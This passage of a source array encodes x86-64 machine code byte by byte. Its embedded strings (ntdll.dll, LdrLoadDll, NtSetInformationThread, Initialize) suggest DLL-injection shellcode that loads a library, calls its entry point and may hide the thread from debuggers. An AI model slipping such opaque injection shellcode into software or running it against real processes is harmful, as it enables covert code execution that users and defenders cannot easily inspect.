  X_BYTE_ENC(0x44,0x02C0), X_BYTE_ENC(0x24,0x02C1), X_BYTE_ENC(0x38,0x02C2), X_BYTE_ENC(0x48,0x02C3),
  X_BYTE_ENC(0x85,0x02C4), X_BYTE_ENC(0xC0,0x02C5), X_BYTE_ENC(0x75,0x02C6), X_BYTE_ENC(0x0D,0x02C7),
  X_BYTE_ENC(0xC7,0x02C8), X_BYTE_ENC(0x44,0x02C9), X_BYTE_ENC(0x24,0x02CA), X_BYTE_ENC(0x48,0x02CB),
  X_BYTE_ENC(0x7F,0x02CC), X_BYTE_ENC(0x00,0x02CD), X_BYTE_ENC(0x07,0x02CE), X_BYTE_ENC(0x80,0x02CF),
  X_BYTE_ENC(0xE9,0x02D0), X_BYTE_ENC(0xFF,0x02D1), X_BYTE_ENC(0x00,0x02D2), X_BYTE_ENC(0x00,0x02D3),
  X_BYTE_ENC(0x00,0x02D4), X_BYTE_ENC(0x48,0x02D5), X_BYTE_ENC(0x8B,0x02D6), X_BYTE_ENC(0x84,0x02D7),
  X_BYTE_ENC(0x24,0x02D8), X_BYTE_ENC(0xA0,0x02D9), X_BYTE_ENC(0x00,0x02DA), X_BYTE_ENC(0x00,0x02DB),
  X_BYTE_ENC(0x00,0x02DC), X_BYTE_ENC(0x4C,0x02DD), X_BYTE_ENC(0x8D,0x02DE), X_BYTE_ENC(0x40,0x02DF),
  X_BYTE_ENC(0x10,0x02E0), X_BYTE_ENC(0x49,0x02E1), X_BYTE_ENC(0x83,0x02E2), X_BYTE_ENC(0x38,0x02E3),
  X_BYTE_ENC(0x00,0x02E4), X_BYTE_ENC(0x74,0x02E5), X_BYTE_ENC(0x31,0x02E6), X_BYTE_ENC(0x48,0x02E7),
  X_BYTE_ENC(0xB9,0x02E8), X_BYTE_ENC(0xFE,0x02E9), X_BYTE_ENC(0xFF,0x02EA), X_BYTE_ENC(0xFF,0x02EB),
  X_BYTE_ENC(0xFF,0x02EC), X_BYTE_ENC(0xFF,0x02ED), X_BYTE_ENC(0xFF,0x02EE), X_BYTE_ENC(0xFF,0x02EF),
  X_BYTE_ENC(0xFF,0x02F0), X_BYTE_ENC(0x48,0x02F1), X_BYTE_ENC(0xC7,0x02F2), X_BYTE_ENC(0xC2,0x02F3),
  X_BYTE_ENC(0x05,0x02F4), X_BYTE_ENC(0x00,0x02F5), X_BYTE_ENC(0x00,0x02F6), X_BYTE_ENC(0x00,0x02F7),
  X_BYTE_ENC(0x49,0x02F8), X_BYTE_ENC(0xC7,0x02F9), X_BYTE_ENC(0xC1,0x02FA), X_BYTE_ENC(0x08,0x02FB),
  X_BYTE_ENC(0x00,0x02FC), X_BYTE_ENC(0x00,0x02FD), X_BYTE_ENC(0x00,0x02FE), X_BYTE_ENC(0xFF,0x02FF),
  X_BYTE_ENC(0x54,0x0300), X_BYTE_ENC(0x24,0x0301), X_BYTE_ENC(0x38,0x0302), X_BYTE_ENC(0xA9,0x0303),
  X_BYTE_ENC(0x00,0x0304), X_BYTE_ENC(0x00,0x0305), X_BYTE_ENC(0x00,0x0306), X_BYTE_ENC(0x80,0x0307),
  X_BYTE_ENC(0x74,0x0308), X_BYTE_ENC(0x0E,0x0309), X_BYTE_ENC(0x0D,0x030A), X_BYTE_ENC(0x00,0x030B),
  X_BYTE_ENC(0x00,0x030C), X_BYTE_ENC(0x00,0x030D), X_BYTE_ENC(0x10,0x030E), X_BYTE_ENC(0x89,0x030F),
  X_BYTE_ENC(0x44,0x0310), X_BYTE_ENC(0x24,0x0311), X_BYTE_ENC(0x48,0x0312), X_BYTE_ENC(0xE9,0x0313),
  X_BYTE_ENC(0xBC,0x0314), X_BYTE_ENC(0x00,0x0315), X_BYTE_ENC(0x00,0x0316), X_BYTE_ENC(0x00,0x0317),
  X_BYTE_ENC(0x48,0x0318), X_BYTE_ENC(0x8B,0x0319), X_BYTE_ENC(0x84,0x031A), X_BYTE_ENC(0x24,0x031B),
  X_BYTE_ENC(0xA0,0x031C), X_BYTE_ENC(0x00,0x031D), X_BYTE_ENC(0x00,0x031E), X_BYTE_ENC(0x00,0x031F),
  X_BYTE_ENC(0x48,0x0320), X_BYTE_ENC(0x8B,0x0321), X_BYTE_ENC(0x08,0x0322), X_BYTE_ENC(0xE8,0x0323),
  X_BYTE_ENC(0xB4,0x0324), X_BYTE_ENC(0xFD,0x0325), X_BYTE_ENC(0xFF,0x0326), X_BYTE_ENC(0xFF,0x0327),
  X_BYTE_ENC(0x48,0x0328), X_BYTE_ENC(0x85,0x0329), X_BYTE_ENC(0xC0,0x032A), X_BYTE_ENC(0x74,0x032B),
  X_BYTE_ENC(0x0D,0x032C), X_BYTE_ENC(0xC7,0x032D), X_BYTE_ENC(0x44,0x032E), X_BYTE_ENC(0x24,0x032F),
  X_BYTE_ENC(0x48,0x0330), X_BYTE_ENC(0xDF,0x0331), X_BYTE_ENC(0x04,0x0332), X_BYTE_ENC(0x07,0x0333),
  X_BYTE_ENC(0x80,0x0334), X_BYTE_ENC(0xE9,0x0335), X_BYTE_ENC(0x9A,0x0336), X_BYTE_ENC(0x00,0x0337),
  X_BYTE_ENC(0x00,0x0338), X_BYTE_ENC(0x00,0x0339), X_BYTE_ENC(0x48,0x033A), X_BYTE_ENC(0x8B,0x033B),
  X_BYTE_ENC(0x84,0x033C), X_BYTE_ENC(0x24,0x033D), X_BYTE_ENC(0xA0,0x033E), X_BYTE_ENC(0x00,0x033F),
  X_BYTE_ENC(0x00,0x0340), X_BYTE_ENC(0x00,0x0341), X_BYTE_ENC(0x48,0x0342), X_BYTE_ENC(0x8B,0x0343),
  X_BYTE_ENC(0x08,0x0344), X_BYTE_ENC(0x48,0x0345), X_BYTE_ENC(0x8D,0x0346), X_BYTE_ENC(0x44,0x0347),
  X_BYTE_ENC(0x24,0x0348), X_BYTE_ENC(0x60,0x0349), X_BYTE_ENC(0x48,0x034A), X_BYTE_ENC(0x89,0x034B),
  X_BYTE_ENC(0x48,0x034C), X_BYTE_ENC(0x08,0x034D), X_BYTE_ENC(0x48,0x034E), X_BYTE_ENC(0x33,0x034F),
  X_BYTE_ENC(0xD2,0x0350), X_BYTE_ENC(0x66,0x0351), X_BYTE_ENC(0x83,0x0352), X_BYTE_ENC(0x3C,0x0353),
  X_BYTE_ENC(0x0A,0x0354), X_BYTE_ENC(0x00,0x0355), X_BYTE_ENC(0x74,0x0356), X_BYTE_ENC(0x06,0x0357),
  X_BYTE_ENC(0x48,0x0358), X_BYTE_ENC(0x83,0x0359), X_BYTE_ENC(0xC2,0x035A), X_BYTE_ENC(0x02,0x035B),
  X_BYTE_ENC(0xEB,0x035C), X_BYTE_ENC(0xF3,0x035D), X_BYTE_ENC(0x66,0x035E), X_BYTE_ENC(0x89,0x035F),
  X_BYTE_ENC(0x10,0x0360), X_BYTE_ENC(0x66,0x0361), X_BYTE_ENC(0x89,0x0362), X_BYTE_ENC(0x50,0x0363),
  X_BYTE_ENC(0x02,0x0364), X_BYTE_ENC(0x48,0x0365), X_BYTE_ENC(0x33,0x0366), X_BYTE_ENC(0xC9,0x0367),
  X_BYTE_ENC(0x48,0x0368), X_BYTE_ENC(0x33,0x0369), X_BYTE_ENC(0xD2,0x036A), X_BYTE_ENC(0x4C,0x036B),
  X_BYTE_ENC(0x8D,0x036C), X_BYTE_ENC(0x44,0x036D), X_BYTE_ENC(0x24,0x036E), X_BYTE_ENC(0x60,0x036F),
  X_BYTE_ENC(0x4C,0x0370), X_BYTE_ENC(0x8D,0x0371), X_BYTE_ENC(0x4C,0x0372), X_BYTE_ENC(0x24,0x0373),
  X_BYTE_ENC(0x40,0x0374), X_BYTE_ENC(0xFF,0x0375), X_BYTE_ENC(0x54,0x0376), X_BYTE_ENC(0x24,0x0377),
  X_BYTE_ENC(0x28,0x0378), X_BYTE_ENC(0xA9,0x0379), X_BYTE_ENC(0x00,0x037A), X_BYTE_ENC(0x00,0x037B),
  X_BYTE_ENC(0x00,0x037C), X_BYTE_ENC(0x80,0x037D), X_BYTE_ENC(0x74,0x037E), X_BYTE_ENC(0x0B,0x037F),
  X_BYTE_ENC(0x0D,0x0380), X_BYTE_ENC(0x00,0x0381), X_BYTE_ENC(0x00,0x0382), X_BYTE_ENC(0x00,0x0383),
  X_BYTE_ENC(0x10,0x0384), X_BYTE_ENC(0x89,0x0385), X_BYTE_ENC(0x44,0x0386), X_BYTE_ENC(0x24,0x0387),
  X_BYTE_ENC(0x48,0x0388), X_BYTE_ENC(0xEB,0x0389), X_BYTE_ENC(0x49,0x038A), X_BYTE_ENC(0x48,0x038B),
  X_BYTE_ENC(0x8D,0x038C), X_BYTE_ENC(0x05,0x038D), X_BYTE_ENC(0xD9,0x038E), X_BYTE_ENC(0x00,0x038F),
  X_BYTE_ENC(0x00,0x0390), X_BYTE_ENC(0x00,0x0391), X_BYTE_ENC(0x48,0x0392), X_BYTE_ENC(0x8B,0x0393),
  X_BYTE_ENC(0xD0,0x0394), X_BYTE_ENC(0x48,0x0395), X_BYTE_ENC(0x8B,0x0396), X_BYTE_ENC(0x4C,0x0397),
  X_BYTE_ENC(0x24,0x0398), X_BYTE_ENC(0x40,0x0399), X_BYTE_ENC(0xE8,0x039A), X_BYTE_ENC(0xB2,0x039B),
  X_BYTE_ENC(0xFD,0x039C), X_BYTE_ENC(0xFF,0x039D), X_BYTE_ENC(0xFF,0x039E), X_BYTE_ENC(0x48,0x039F),
  X_BYTE_ENC(0x89,0x03A0), X_BYTE_ENC(0x44,0x03A1), X_BYTE_ENC(0x24,0x03A2), X_BYTE_ENC(0x50,0x03A3),
  X_BYTE_ENC(0x48,0x03A4), X_BYTE_ENC(0x85,0x03A5), X_BYTE_ENC(0xC0,0x03A6), X_BYTE_ENC(0x75,0x03A7),
  X_BYTE_ENC(0x0A,0x03A8), X_BYTE_ENC(0xC7,0x03A9), X_BYTE_ENC(0x44,0x03AA), X_BYTE_ENC(0x24,0x03AB),
  X_BYTE_ENC(0x48,0x03AC), X_BYTE_ENC(0x7F,0x03AD), X_BYTE_ENC(0x00,0x03AE), X_BYTE_ENC(0x07,0x03AF),
  X_BYTE_ENC(0x80,0x03B0), X_BYTE_ENC(0xEB,0x03B1), X_BYTE_ENC(0x18,0x03B2), X_BYTE_ENC(0x48,0x03B3),
  X_BYTE_ENC(0x8B,0x03B4), X_BYTE_ENC(0x84,0x03B5), X_BYTE_ENC(0x24,0x03B6), X_BYTE_ENC(0xA0,0x03B7),
  X_BYTE_ENC(0x00,0x03B8), X_BYTE_ENC(0x00,0x03B9), X_BYTE_ENC(0x00,0x03BA), X_BYTE_ENC(0x48,0x03BB),
  X_BYTE_ENC(0x8B,0x03BC), X_BYTE_ENC(0x48,0x03BD), X_BYTE_ENC(0x08,0x03BE), X_BYTE_ENC(0xFF,0x03BF),
  X_BYTE_ENC(0x54,0x03C0), X_BYTE_ENC(0x24,0x03C1), X_BYTE_ENC(0x50,0x03C2), X_BYTE_ENC(0x89,0x03C3),
  X_BYTE_ENC(0x44,0x03C4), X_BYTE_ENC(0x24,0x03C5), X_BYTE_ENC(0x48,0x03C6), X_BYTE_ENC(0x85,0x03C7),
  X_BYTE_ENC(0xC0,0x03C8), X_BYTE_ENC(0x74,0x03C9), X_BYTE_ENC(0x09,0x03CA), X_BYTE_ENC(0x48,0x03CB),
  X_BYTE_ENC(0x8B,0x03CC), X_BYTE_ENC(0x4C,0x03CD), X_BYTE_ENC(0x24,0x03CE), X_BYTE_ENC(0x40,0x03CF),
  X_BYTE_ENC(0xFF,0x03D0), X_BYTE_ENC(0x54,0x03D1), X_BYTE_ENC(0x24,0x03D2), X_BYTE_ENC(0x30,0x03D3),
  X_BYTE_ENC(0x48,0x03D4), X_BYTE_ENC(0x33,0x03D5), X_BYTE_ENC(0xC0,0x03D6), X_BYTE_ENC(0x48,0x03D7),
  X_BYTE_ENC(0x39,0x03D8), X_BYTE_ENC(0x44,0x03D9), X_BYTE_ENC(0x24,0x03DA), X_BYTE_ENC(0x38,0x03DB),
  X_BYTE_ENC(0x74,0x03DC), X_BYTE_ENC(0x38,0x03DD), X_BYTE_ENC(0x48,0x03DE), X_BYTE_ENC(0x8B,0x03DF),
  X_BYTE_ENC(0x84,0x03E0), X_BYTE_ENC(0x24,0x03E1), X_BYTE_ENC(0xA0,0x03E2), X_BYTE_ENC(0x00,0x03E3),
  X_BYTE_ENC(0x00,0x03E4), X_BYTE_ENC(0x00,0x03E5), X_BYTE_ENC(0x4C,0x03E6), X_BYTE_ENC(0x8D,0x03E7),
  X_BYTE_ENC(0x40,0x03E8), X_BYTE_ENC(0x10,0x03E9), X_BYTE_ENC(0x48,0x03EA), X_BYTE_ENC(0x33,0x03EB),
  X_BYTE_ENC(0xC0,0x03EC), X_BYTE_ENC(0x49,0x03ED), X_BYTE_ENC(0x39,0x03EE), X_BYTE_ENC(0x00,0x03EF),
  X_BYTE_ENC(0x74,0x03F0), X_BYTE_ENC(0x24,0x03F1), X_BYTE_ENC(0x4C,0x03F2), X_BYTE_ENC(0x8D,0x03F3),
  X_BYTE_ENC(0x44,0x03F4), X_BYTE_ENC(0x24,0x03F5), X_BYTE_ENC(0x58,0x03F6), X_BYTE_ENC(0x49,0x03F7),
  X_BYTE_ENC(0x89,0x03F8), X_BYTE_ENC(0x00,0x03F9), X_BYTE_ENC(0x48,0x03FA), X_BYTE_ENC(0xB9,0x03FB),
  X_BYTE_ENC(0xFE,0x03FC), X_BYTE_ENC(0xFF,0x03FD), X_BYTE_ENC(0xFF,0x03FE), X_BYTE_ENC(0xFF,0x03FF),
  X_BYTE_ENC(0xFF,0x0400), X_BYTE_ENC(0xFF,0x0401), X_BYTE_ENC(0xFF,0x0402), X_BYTE_ENC(0xFF,0x0403),
  X_BYTE_ENC(0x48,0x0404), X_BYTE_ENC(0xC7,0x0405), X_BYTE_ENC(0xC2,0x0406), X_BYTE_ENC(0x05,0x0407),
  X_BYTE_ENC(0x00,0x0408), X_BYTE_ENC(0x00,0x0409), X_BYTE_ENC(0x00,0x040A), X_BYTE_ENC(0x49,0x040B),
  X_BYTE_ENC(0xC7,0x040C), X_BYTE_ENC(0xC1,0x040D), X_BYTE_ENC(0x08,0x040E), X_BYTE_ENC(0x00,0x040F),
  X_BYTE_ENC(0x00,0x0410), X_BYTE_ENC(0x00,0x0411), X_BYTE_ENC(0xFF,0x0412), X_BYTE_ENC(0x54,0x0413),
  X_BYTE_ENC(0x24,0x0414), X_BYTE_ENC(0x38,0x0415), X_BYTE_ENC(0x48,0x0416), X_BYTE_ENC(0x33,0x0417),
  X_BYTE_ENC(0xC0,0x0418), X_BYTE_ENC(0x8B,0x0419), X_BYTE_ENC(0x44,0x041A), X_BYTE_ENC(0x24,0x041B),
  X_BYTE_ENC(0x48,0x041C), X_BYTE_ENC(0x48,0x041D), X_BYTE_ENC(0x81,0x041E), X_BYTE_ENC(0xC4,0x041F),
  X_BYTE_ENC(0x98,0x0420), X_BYTE_ENC(0x00,0x0421), X_BYTE_ENC(0x00,0x0422), X_BYTE_ENC(0x00,0x0423),
  X_BYTE_ENC(0xC3,0x0424), X_BYTE_ENC(0x0F,0x0425), X_BYTE_ENC(0x1F,0x0426), X_BYTE_ENC(0x00,0x0427),
  X_BYTE_ENC(0x6E,0x0428), X_BYTE_ENC(0x00,0x0429), X_BYTE_ENC(0x74,0x042A), X_BYTE_ENC(0x00,0x042B),
  X_BYTE_ENC(0x64,0x042C), X_BYTE_ENC(0x00,0x042D), X_BYTE_ENC(0x6C,0x042E), X_BYTE_ENC(0x00,0x042F),
  X_BYTE_ENC(0x6C,0x0430), X_BYTE_ENC(0x00,0x0431), X_BYTE_ENC(0x2E,0x0432), X_BYTE_ENC(0x00,0x0433),
  X_BYTE_ENC(0x64,0x0434), X_BYTE_ENC(0x00,0x0435), X_BYTE_ENC(0x6C,0x0436), X_BYTE_ENC(0x00,0x0437),
  X_BYTE_ENC(0x6C,0x0438), X_BYTE_ENC(0x00,0x0439), X_BYTE_ENC(0x00,0x043A), X_BYTE_ENC(0x00,0x043B),
  X_BYTE_ENC(0x4C,0x043C), X_BYTE_ENC(0x64,0x043D), X_BYTE_ENC(0x72,0x043E), X_BYTE_ENC(0x4C,0x043F),
  X_BYTE_ENC(0x6F,0x0440), X_BYTE_ENC(0x61,0x0441), X_BYTE_ENC(0x64,0x0442), X_BYTE_ENC(0x44,0x0443),
  X_BYTE_ENC(0x6C,0x0444), X_BYTE_ENC(0x6C,0x0445), X_BYTE_ENC(0x00,0x0446), X_BYTE_ENC(0x4C,0x0447),
  X_BYTE_ENC(0x64,0x0448), X_BYTE_ENC(0x72,0x0449), X_BYTE_ENC(0x55,0x044A), X_BYTE_ENC(0x6E,0x044B),
  X_BYTE_ENC(0x6C,0x044C), X_BYTE_ENC(0x6F,0x044D), X_BYTE_ENC(0x61,0x044E), X_BYTE_ENC(0x64,0x044F),
  X_BYTE_ENC(0x44,0x0450), X_BYTE_ENC(0x6C,0x0451), X_BYTE_ENC(0x6C,0x0452), X_BYTE_ENC(0x00,0x0453),
  X_BYTE_ENC(0x4E,0x0454), X_BYTE_ENC(0x74,0x0455), X_BYTE_ENC(0x53,0x0456), X_BYTE_ENC(0x65,0x0457),
  X_BYTE_ENC(0x74,0x0458), X_BYTE_ENC(0x49,0x0459), X_BYTE_ENC(0x6E,0x045A), X_BYTE_ENC(0x66,0x045B),
  X_BYTE_ENC(0x6F,0x045C), X_BYTE_ENC(0x72,0x045D), X_BYTE_ENC(0x6D,0x045E), X_BYTE_ENC(0x61,0x045F),
  X_BYTE_ENC(0x74,0x0460), X_BYTE_ENC(0x69,0x0461), X_BYTE_ENC(0x6F,0x0462), X_BYTE_ENC(0x6E,0x0463),
  X_BYTE_ENC(0x54,0x0464), X_BYTE_ENC(0x68,0x0465), X_BYTE_ENC(0x72,0x0466), X_BYTE_ENC(0x65,0x0467),
  X_BYTE_ENC(0x61,0x0468), X_BYTE_ENC(0x64,0x0469), X_BYTE_ENC(0x00,0x046A), X_BYTE_ENC(0x49,0x046B),
  X_BYTE_ENC(0x6E,0x046C), X_BYTE_ENC(0x69,0x046D), X_BYTE_ENC(0x74,0x046E), X_BYTE_ENC(0x69,0x046F),
  X_BYTE_ENC(0x61,0x0470), X_BYTE_ENC(0x6C,0x0471), X_BYTE_ENC(0x69,0x0472), X_BYTE_ENC(0x7A,0x0473),
  X_BYTE_ENC(0x65,0x0474), X_BYTE_ENC(0x00,0x0475)
};
